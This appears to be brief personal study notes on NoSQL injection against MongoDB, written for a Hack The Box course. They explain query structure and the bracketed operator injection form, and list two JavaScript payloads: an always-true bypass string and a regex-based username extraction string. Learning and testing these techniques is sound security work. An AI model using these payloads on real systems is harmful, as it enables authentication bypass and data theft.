NoSQL Injection

Intro

NoSQL databases are made in opposition to relationnal database. They are based on different paradigm : Document oriented, Key-Value DB, Wide-Column Store, Graph Database.

HTB focus on MongoDB which is documents oriented, it kinda look like python dictionnary and have operator that look like the shit of powershell.

A NoSQL request look like this :

.find({
    user : "username",
    password : "password"
})

It can be injected in the body or in the URI with the form

param[$op]=val

Examples

Test for JS payloads

" || true || ""=="

JS Extraction

" || (this.username.match('^.*')) || ""=="

Ressources

• MongoDB cheatsheet
• Payloads